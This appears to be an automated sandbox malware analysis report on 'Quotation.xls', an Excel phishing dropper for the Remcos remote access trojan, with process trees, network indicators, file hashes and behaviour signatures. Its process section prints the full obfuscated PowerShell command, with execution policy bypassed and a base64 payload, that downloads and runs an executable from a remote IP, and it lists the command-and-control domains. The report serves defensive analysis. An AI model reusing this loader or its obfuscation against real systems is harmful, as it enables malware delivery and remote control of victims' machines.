Malware Analysis Report

2025-01-02 03:28

Sample ID 240724-mjzmra1fpr
Target Quotation.xls
SHA256 c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Tags
remcos 2556 defense_evasion discovery execution phishing rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5

Threat Level: Known bad

The file Quotation.xls was found to be: Known bad.

Malicious Activity Summary

remcos 2556 defense_evasion discovery execution phishing rat

Remcos

Process spawned unexpected child process

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

Detected phishing page

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy service COM API

Uses Task Scheduler COM API

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-24 10:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-24 10:30

Reported

2024-07-24 10:33

Platform

win7-20240704-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winiti.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1108 set thread context of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Detected phishing page

phishing

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2904 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2904 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2904 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 1652 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2760 wrote to memory of 1652 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2760 wrote to memory of 1652 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2760 wrote to memory of 1652 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1652 wrote to memory of 2232 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1652 wrote to memory of 2232 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1652 wrote to memory of 2232 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1652 wrote to memory of 2232 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2760 wrote to memory of 1108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 2760 wrote to memory of 1108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 2760 wrote to memory of 1108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 2760 wrote to memory of 1108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1108 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"

C:\Users\Admin\AppData\Roaming\winiti.exe

"C:\Users\Admin\AppData\Roaming\winiti.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tny.wtf udp
US 172.67.156.72:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 172.67.156.72:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 107.173.143.46:80 107.173.143.46 tcp
US 8.8.8.8:53 bossnacarpet.com udp
US 173.255.204.62:2556 bossnacarpet.com tcp
US 8.8.8.8:53 vegetachcnc.com udp
US 107.173.4.18:2556 vegetachcnc.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

memory/1356-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1356-1-0x00000000728CD000-0x00000000728D8000-memory.dmp

memory/2904-3-0x0000000002970000-0x0000000002972000-memory.dmp

memory/1356-4-0x00000000030F0000-0x00000000030F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta

MD5 5c8152c47be9ca7a398a85d2e51b2505
SHA1 34eeba07fe8667b81f14be825223b26006d7d042
SHA256 ec3c6a6050bd2e48b86fa5c770b78963ed6f13f5adbd9e96ce86dd81e27ab3cd
SHA512 8f4cf39c381f68cb3fe3230823b7a96d2808bae4ec3e44c7a2bd90946264da74736fae170cc0f471049b6e4d5ea9b9518f45a078a191ba401ad7b6d8321bae4a

\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline

MD5 b747cdd0ffea5c8ddf7131e17823747f
SHA1 41a278eddce8b4771d5b42be18cac33331d2d792
SHA256 d6caa87edcd6c6751870a20178feeae84a47f104537deb1d22571441a9ae16cf
SHA512 826600fa32ebd9e6fdff00288c2ab0805dd38dc604b4d8835bf148da66711daa7ab5468f92c4b91b39b65f88d1396d65d9d9fcf70703e0de89ff4029dff807a1

\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.0.cs

MD5 a83dc0e46bbad233951be9e3fdba130c
SHA1 892cfc6827bb1072ec2e26bbf83457497d6a17cb
SHA256 aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967
SHA512 e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

\??\c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp

MD5 03a5865dc15c5d0f43ced1aee7a8d16e
SHA1 81458a58ad5a09f87c5d7b15e4c02dd7a5166555
SHA256 be1ac8c1b9aebfbe284e5ecd496a0b3322dddd159517c2d7c34770d179ba269f
SHA512 a74181241d37ac5c91766c1122c89cb9bd2e12c24f977fa90ff57b7e5f5fe1f127f8f7182fdd8eee6a3466232dfcec16a68e152c0ef18c15ca265ff8b3fdb428

C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp

MD5 35c7d65fd3c27e01c9579b744902459c
SHA1 36491adf9dccab029e8da529632e88fe6d9fab55
SHA256 7b1d94b818cd392846cff1ce027e9fdc66430ef99ee4dbad38f77ab8472dd957
SHA512 28cc5a69bb7fca63d1b3de271716ef54affe377712cffd878ae14ed1184c2b7fb60ed514de134f1f753bf734cfb0e9f2dfd9930b6868b74d69c46edd0cef844a

C:\Users\Admin\AppData\Local\Temp\wrr7nadr.dll

MD5 930f55e4011c2193939d376948c305ad
SHA1 06464223e8a3f1074a858d66f5308c9115639691
SHA256 077694a40703c99a0abc8f1dd04de38912a09c4e9a8e937f6c07cf1b221ffcec
SHA512 e78f11bf5a8b4a4124769fed5c2f5cfc2b1506412fd9e5f40bb4ef6b1bec7c9522f8cf84a739171b42031e3ec10edfa6ae2b97f8194aa6554ef9de7fdd9056c1

C:\Users\Admin\AppData\Local\Temp\wrr7nadr.pdb

MD5 d861d056a5c35a467b54b45eec5b3f39
SHA1 e4e34e26d1800c8b57cffe70c8a3150c29c62162
SHA256 5ea37039bff6e70ee7d2db0a8e996bd571b3246d6e4e8da21abb3f641921e4a1
SHA512 0fc597035a4ccd1c893c5ca30cc3254e0639acfe60e2159128ce68e5cb4942fc2f9d65fda27072d2739e840999ef47e644437868b120c570a398903d87d3dbe4

C:\Users\Admin\AppData\Roaming\winiti.exe

MD5 f6bf8ada032d17192526ffebb48aed79
SHA1 362cb802e430115288638c9d613f00412f1b2519
SHA256 153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d
SHA512 0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

memory/2884-36-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-37-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-38-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-39-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-40-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-41-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-42-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-43-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1356-47-0x00000000728CD000-0x00000000728D8000-memory.dmp

memory/2884-48-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-51-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-52-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-53-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2884-54-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-24 10:30

Reported

2024-07-24 10:33

Platform

win10v2004-20240709-en

Max time kernel

143s

Max time network

133s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1628 wrote to memory of 3688 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1628 wrote to memory of 3688 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 tny.wtf udp
US 104.21.40.183:80 tny.wtf tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 8.8.8.8:53 183.40.21.104.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 15.118.3.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/1628-0-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-2-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-3-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-1-0x00007FFB12E2D000-0x00007FFB12E2E000-memory.dmp

memory/1628-6-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-5-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-8-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-7-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-9-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-4-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-12-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-11-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-10-0x00007FFAD0860000-0x00007FFAD0870000-memory.dmp

memory/1628-13-0x00007FFAD0860000-0x00007FFAD0870000-memory.dmp

memory/3688-30-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/3688-29-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/3688-31-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/3688-32-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 0e7ee9deb29b355cd65ec941d250191e
SHA1 e9e0abd1e852a87b62599092ec99ff20e3baf211
SHA256 af21a14f64edb0dd0499a6b7e7c031d039f61438c78d742479d33f94e040fa81
SHA512 9d0fa54e29a5c5db95cd21893420b6923618c949cf7dc6d4547ec718993dc70c84c8209c46dc14b2f55eceb81d8070b92db8229f277d16b457f3d078f91ad187

memory/3688-42-0x00007FF76E420000-0x00007FF76E428000-memory.dmp

memory/1628-43-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-44-0x00007FFB12E2D000-0x00007FFB12E2E000-memory.dmp

memory/1628-45-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-47-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/3688-48-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp

memory/1628-76-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-77-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-75-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-74-0x00007FFAD2E10000-0x00007FFAD2E20000-memory.dmp

memory/1628-78-0x00007FFB12D90000-0x00007FFB12F85000-memory.dmp